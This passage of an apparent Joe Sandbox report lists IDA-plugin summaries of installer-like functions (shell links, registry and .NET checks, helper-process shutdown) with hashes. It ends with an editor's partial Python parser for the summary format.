• SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
• RealizePalette.GDI32(00000000), ref: 0041CB7D
• SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
• RealizePalette.GDI32(0041CE3C), ref: 0041CB95
• SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
• SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
• BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
• SelectObject.GDI32(00000000,?), ref: 0041CBEE
• DeleteDC.GDI32(00000000), ref: 0041CC04
  • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
• String ID:
• API String ID: 269503290-0
• Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
• Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
• Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
• Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
Uniqueness
• Uniqueness Score: -1.00%

APIs
• 756FE550.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
• 756FE550.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
• SysFreeString.OLEAUT32(00000000), ref: 0045685B
Strings
• IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
• %ProgramFiles(x86)%\, xrefs: 0045672E
• IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
• IPersistFile::Save, xrefs: 00456962
• {pf32}\, xrefs: 0045671E
• CoCreateInstance, xrefs: 004566AF
• IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
• IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
• IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
• IPropertyStore::Commit, xrefs: 004568E3
• IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: E550$FreeString
• String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
• API String ID: 491012016-2363233914
• Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
• Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
• Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
• Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
• CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
• ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
• ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
  • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
• String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
• API String ID: 2000705611-3672972446
• Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
• Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
• Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
• Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ErrorLast
                                                                                                                                                                                                                                  • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                                                                                                                                                                  • API String ID: 1452528299-3112430753
                                                                                                                                                                                                                                  • Opcode ID: b969254c7af52069d00d450bc25108601270d2f9398ad690918fa25cf6f4b58e
                                                                                                                                                                                                                                  • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b969254c7af52069d00d450bc25108601270d2f9398ad690918fa25cf6f4b58e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• GetVersion.KERNEL32 ref: 0045CBDA
• GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
• GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
• GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
• GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
  • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
• AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
• GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
• String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
• API String ID: 59345061-4263478283
• Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
• Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
• Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
• Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
• CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
• GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
• CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
• GetDC.USER32(00000000), ref: 0041B402
• CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
• ReleaseDC.USER32(00000000,00000000), ref: 0041B455
• SelectObject.GDI32(00000000,?), ref: 0041B470
• SelectObject.GDI32(?,00000000), ref: 0041B47F
• StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
• SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
• SelectObject.GDI32(?,00000000), ref: 0041B4C7
• DeleteDC.GDI32(00000000), ref: 0041B4D0
• DeleteDC.GDI32(?), ref: 0041B4D9
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
• String ID:
• API String ID: 644427674-0
• Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
• Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
• Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
• Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
• SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
• SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
• SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
• String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
• API String ID: 971782779-3668018701
• Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
• Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
• Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
• Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
  • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
• RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
• RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
Strings
• RegOpenKeyEx, xrefs: 00454910
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
• , xrefs: 004548FE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: QueryValue$FormatMessageOpen
                                                                                                                                                                                                                                  • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                                                                                                                                  • API String ID: 2812809588-1577016196
                                                                                                                                                                                                                                  • Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                                                                                                                                                                  • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                                                                                                                                                                                    • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                                                                                                                                                                                                  • v4.0.30319, xrefs: 004594F1
                                                                                                                                                                                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                                                                                                                                                                                                  • .NET Framework version %s not found, xrefs: 00459609
                                                                                                                                                                                                                                  • v1.1.4322, xrefs: 004595C2
                                                                                                                                                                                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                                                                                                                                                                                                  • v2.0.50727, xrefs: 0045955B
                                                                                                                                                                                                                                  • .NET Framework not found, xrefs: 0045961D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Close$Open
                                                                                                                                                                                                                                  • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                                                                                                                                                                  • API String ID: 2976201327-446240816
                                                                                                                                                                                                                                  • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                                                                                                                                                                  • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                                                                                                                                                                                                  • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                                                                                                                                                                                                  • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                                                                                                                                                                                                  • Helper isn't responding; killing it., xrefs: 00458A87
                                                                                                                                                                                                                                  • Helper process exited., xrefs: 00458AC5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                                                                                                                                                                  • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                                                                                                                                                                  • API String ID: 3355656108-1243109208
                                                                                                                                                                                                                                  • Opcode ID: 8d11a9d6b8ebfffa9e94c3bd241da5180e5b7166b03f76cd8ec90a905d120898
                                                                                                                                                                                                                                  • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d11a9d6b8ebfffa9e94c3bd241da5180e5b7166b03f76cd8ec90a905d120898
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

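The function summaries above (the SharedDLLs registry probe, the .NET Framework Policy-key check and the helper-process stop) are machine-generated by the Joe Sandbox IDA plugin, and the report shows nothing about how to consume them. The following is an added example by the editor, not Joe Sandbox code and not part of the analysed sample: a parser for this summary format that turns the bullet lines into structured records and derives the two things a triager usually wants from such an entry, the registry paths a function touches (with the hive constant decoded, so 80000002 becomes HKLM) and the literal timeouts behind WaitForSingleObject and Sleep (00002710 is 10000 ms and 000000FA is 250 ms, which is what the helper-process entry above encodes). The SAMPLE text is copied from the entries above; the section-heading list, the record field names and the argument index of each timeout are this example's assumptions about the format. One caveat a reader should keep: the log strings in these three entries (SharedDLLs reference counting, the Policy\v4.0, v2.0, v1.1 probe order, "Stopping 64-bit helper process") are the ones the Inno Setup installer runtime emits, so this module at 0x400000 in process 14 looks like an installer stub rather than the payload; the report does not make that attribution itself, so treat it as the editor's inference and verify it against a known Inno Setup build before relying on it.

```python
"""Parser for the Joe Sandbox 'IDA Plugin' function-summary format shown in this report.
Added example by the editor; not Joe Sandbox code and not part of the analysed sample.
Section headings, field names and the timeout argument indexes are this example's
assumptions about the format."""
import re
from dataclasses import dataclass, field
from typing import Optional

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Uniqueness")
API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
                    r"(?P<name>\w+)\.(?P<dll>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})$")
STR_RE = re.compile(r"^•\s*(?P<s>.*?),\s*xrefs:\s*(?P<ref>[0-9A-F]{8})$")
KV_RE = re.compile(r"^•\s*(?P<k>API String ID|API ID|String ID|Opcode ID|Instruction ID|"
                   r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<v>.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(?P<v>-?[0-9.]+)%$")
HIVES = {0x80000000: "HKCR", 0x80000001: "HKCU", 0x80000002: "HKLM", 0x80000003: "HKU"}
TIMEOUT_ARG = {"WaitForSingleObject": 1, "Sleep": 0}  # index of the dwMilliseconds argument

@dataclass
class ApiCall:
    name: str
    dll: str
    args: list                        # int for 8-hex-digit values, None for '?', str otherwise
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # set for 'Part of subcall function XXXXXXXX' lines

@dataclass
class FunctionSummary:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # (text, xref address)
    ids: dict = field(default_factory=dict)      # API ID, String ID, fuzzy hashes ...
    uniqueness: Optional[float] = None

def _arg(tok):
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-F]{8}", tok) else tok

def parse_summaries(text):
    """One FunctionSummary per 'APIs' block; lines before the first block are ignored."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":  # every entry starts with its APIs list
                cur = FunctionSummary()
                entries.append(cur)
            section = line
            continue
        if cur is None:
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            cur.apis.append(ApiCall(m["name"], m["dll"], [_arg(a) for a in m["args"].split(",")],
                                    int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None))
        elif section == "Strings" and (m := STR_RE.match(line)):
            cur.strings.append((m["s"], int(m["ref"], 16)))
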